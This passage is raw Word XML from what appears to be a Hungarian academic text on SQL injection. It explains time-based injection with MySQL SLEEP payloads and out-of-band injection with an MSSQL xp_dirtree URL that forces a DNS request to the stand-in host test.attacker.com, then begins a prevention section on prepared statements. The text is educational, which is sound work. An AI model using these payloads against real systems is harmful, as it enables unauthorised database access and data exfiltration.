      <w:r w:rsidR="00127B4B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127B4B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidR="00384B39" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00384B39" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és az oldal tartalma megváltozik az előző hamis állapothoz képest, akkor a támadó arra következtethet, hogy az injekció működik</w:t>
      </w:r>
      <w:r w:rsidR="00925849" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00006187" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00492DF8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A logikai eredménytől (IGAZ vagy </w:t>
      </w:r>
      <w:r w:rsidR="00492DF8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HAMIS) függően </w:t>
      </w:r>
      <w:r w:rsidR="00A91698" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">tehát </w:t>
      </w:r>
      <w:r w:rsidR="00492DF8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a HTTP válasz tartalma megváltozik, vagy ugyanaz marad</w:t>
      </w:r>
      <w:r w:rsidR="00F808CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E349A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ezt használja ki a vak </w:t>
      </w:r>
      <w:r w:rsidR="005B68B4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D3F39" w14:textId="0E133E78" w:rsidR="004446E5" w:rsidRPr="00D47FAE" w:rsidRDefault="008418A4" w:rsidP="00EA4C76">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az időalapú </w:t>
      </w:r>
      <w:r w:rsidR="00492DF8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">(time-based) </w:t>
      </w:r>
      <w:r w:rsidR="008A1348" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>injekció</w:t>
      </w:r>
      <w:r w:rsidR="00347DD7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE204C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>esetén a támadó egy SQL-parancsot küld a kiszolgálóna</w:t>
      </w:r>
      <w:r w:rsidR="00391034" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00EE204C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, hogy késleltesse a lekérdezések végrehajtását.</w:t>
      </w:r>
      <w:r w:rsidR="00410CFF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Erre </w:t>
      </w:r>
      <w:r w:rsidR="00DE0637" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">például </w:t>
      </w:r>
      <w:r w:rsidR="00410CFF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
      </w:r>
      <w:r w:rsidR="00410CFF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SLEEP</w:t>
      </w:r>
      <w:r w:rsidR="00410CFF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> függvény adhatja: </w:t>
      </w:r>
      <w:r w:rsidR="006A2006" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:r w:rsidR="00250436" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>card</w:t>
      </w:r>
      <w:r w:rsidR="006A2006" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
      </w:r>
      <w:r w:rsidR="00A56271" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5]</w:t>
      </w:r>
      <w:r w:rsidR="006A2006" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EA4C76" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
      </w:r>
      <w:r w:rsidR="00BA2D05" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
      </w:r>
      <w:r w:rsidR="00CC5CE6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE6746" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Következő lépésként például </w:t>
      </w:r>
      <w:r w:rsidR="00A95ABE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kinyerhető</w:t>
      </w:r>
      <w:r w:rsidR="00DE6746" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
      </w:r>
      <w:r w:rsidR="00DE6746" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
      </w:r>
      <w:r w:rsidR="00E733E7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E733E7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00410BDA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D4357" w14:textId="77777777" w:rsidR="00D92C9D" w:rsidRPr="00D47FAE" w:rsidRDefault="00D92C9D" w:rsidP="00D92C9D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63097316" w14:textId="03583C59" w:rsidR="004F00CF" w:rsidRPr="00D47FAE" w:rsidRDefault="004F00CF" w:rsidP="004F00CF">
      <w:pPr>
        <w:pStyle w:val="Stlus3"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc71471966"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>Sávon kívüli (</w:t>
      </w:r>
      <w:r w:rsidR="005F7C20" w:rsidRPr="00D47FAE">
        <w:t>out-of</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>-band)</w:t>
      </w:r>
      <w:r w:rsidR="00F9681E" w:rsidRPr="00D47FAE">
        <w:t xml:space="preserve"> SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7C910973" w14:textId="77777777" w:rsidR="004F00CF" w:rsidRPr="00D47FAE" w:rsidRDefault="004F00CF" w:rsidP="004F00CF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48107180" w14:textId="647B9474" w:rsidR="00722C6A" w:rsidRPr="00D47FAE" w:rsidRDefault="001F0684" w:rsidP="00082FA4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Sávon kívüli injekció akkor fordul elő, amikor a támadó nem tudja ugyan azt a csatornát használni a támadás elindításához és az eredmények összegyűjtéséhez. </w:t>
      </w:r>
      <w:r w:rsidR="00B455AA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A legritkább használt típus a három közül, mivel a webalkalmazás által használt adatbázis-kiszolgálón engedélyezett funkcióktól függ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4F0F9" w14:textId="00499625" w:rsidR="00D02F91" w:rsidRPr="00D47FAE" w:rsidRDefault="00EA1B0A" w:rsidP="003B62D2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ez a technika az adatbázis-szerver azon képességére támaszkodik, hogy </w:t>
      </w:r>
      <w:r w:rsidR="00AC42C4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">adatok továbbításához DNS vagy </w:t>
      </w:r>
      <w:r w:rsidR="00C91F29" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP kéréseket használ. </w:t>
      </w:r>
      <w:r w:rsidR="00FF62D6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A típus sikeres használatakor a felhasználó DNS kérelmét </w:t>
      </w:r>
      <w:r w:rsidR="00D818B1" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a támadó </w:t>
      </w:r>
      <w:r w:rsidR="00FF62D6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy olyan szerverre küldi át</w:t>
      </w:r>
      <w:r w:rsidR="00D02F91" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
      </w:r>
      <w:r w:rsidR="00D02F91" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidR="00D02F91" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> parancsával</w:t>
      </w:r>
      <w:r w:rsidR="00FF62D6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amelyet </w:t>
      </w:r>
      <w:r w:rsidR="003A3649" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ő </w:t>
      </w:r>
      <w:r w:rsidR="00FF62D6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>irányít</w:t>
      </w:r>
      <w:r w:rsidR="00D02F91" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. Ilyen támadásra alkalmas URL</w:t>
      </w:r>
      <w:r w:rsidR="003A3649" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D27D0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>például:</w:t>
      </w:r>
      <w:r w:rsidR="003A3649" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D02F91" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
      </w:r>
      <w:r w:rsidR="003F51CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F51CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00AE2056" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A40660" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Dekódoláskor a </w:t>
      </w:r>
      <w:r w:rsidR="00A40660" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>%20</w:t>
      </w:r>
      <w:r w:rsidR="00A40660" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és a </w:t>
      </w:r>
      <w:r w:rsidR="00A40660" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>%5c</w:t>
      </w:r>
      <w:r w:rsidR="00A40660" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
      </w:r>
      <w:r w:rsidR="00A40660" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
      </w:r>
      <w:r w:rsidR="00356898" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00356898" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00356898" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00704A59" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
      </w:r>
      <w:r w:rsidR="00704A59" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
      </w:r>
      <w:r w:rsidR="0042505F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="009C5540" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C5540" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00704A59" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE3B68" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00600BAD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ezzel</w:t>
      </w:r>
      <w:r w:rsidR="00F53B10" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00730A31" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> támadó</w:t>
      </w:r>
      <w:r w:rsidR="00B83FC9" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00F53B10" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B0898" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>test.master.com</w:t>
      </w:r>
      <w:r w:rsidR="002B0898" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> webhelyre </w:t>
      </w:r>
      <w:r w:rsidR="00656766" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kényszeríti</w:t>
      </w:r>
      <w:r w:rsidR="002B0898" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a DNS kérést</w:t>
      </w:r>
      <w:r w:rsidR="00693728" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, a támadás sikeres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C02F3" w14:textId="77777777" w:rsidR="001F0684" w:rsidRPr="00D47FAE" w:rsidRDefault="001F0684" w:rsidP="00722C6A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7823612A" w14:textId="7E0825BF" w:rsidR="00722C6A" w:rsidRPr="00D47FAE" w:rsidRDefault="00722C6A" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc71471967"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Megelőzési módjai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="210DBCDB" w14:textId="77777777" w:rsidR="002E165F" w:rsidRPr="00D47FAE" w:rsidRDefault="002E165F" w:rsidP="002E165F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17939FF1" w14:textId="187778DF" w:rsidR="00FF0472" w:rsidRPr="00D47FAE" w:rsidRDefault="00F632DE" w:rsidP="00F06072">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az SQL injekciós </w:t>
      </w:r>
      <w:r w:rsidR="00520B83" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sebezhetőség</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> elkerülése </w:t>
      </w:r>
      <w:r w:rsidR="00DD5B10" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>meglepően</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC29EF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egyszerű, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">szembekerülve azzal a ténnyel, milyen sok </w:t>
      </w:r>
      <w:r w:rsidR="009C1EF6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hasonló</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> fajta támadás fordul elő</w:t>
      </w:r>
      <w:r w:rsidR="00DD1162" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F375A9" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA2508" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A biztonsági rések megelőzésére is több lehetőség van.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF6F24" w14:textId="3C4B3D3E" w:rsidR="00C73A3C" w:rsidRPr="00D47FAE" w:rsidRDefault="00C73A3C" w:rsidP="00361B81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4624E315" w14:textId="104A2A0F" w:rsidR="00C73A3C" w:rsidRPr="00D47FAE" w:rsidRDefault="00C73A3C" w:rsidP="00B53A21">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD94DD" w14:textId="2625905B" w:rsidR="00AC45C3" w:rsidRPr="00D47FAE" w:rsidRDefault="00AC45C3" w:rsidP="00BA0966">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6C81F1" w14:textId="77777777" w:rsidR="00607568" w:rsidRPr="00D47FAE" w:rsidRDefault="002F28D5" w:rsidP="006C72E7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az elkészített utasítás egy paraméterezett és újrafelhasználható SQL lekérdezés, amely arra kényszeríti a fejlesztőt, hogy külön írja be az SQL parancsot és a felhasználó által megadott adatokat.</w:t>
      </w:r>
      <w:r w:rsidR="00B85746" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ez a kódolási stílus lehetővé teszi az adatbázis számára, hogy különbséget tegyen a kód és az adatok között</w:t>
      </w:r>
      <w:r w:rsidR="0076656A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00097E49" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
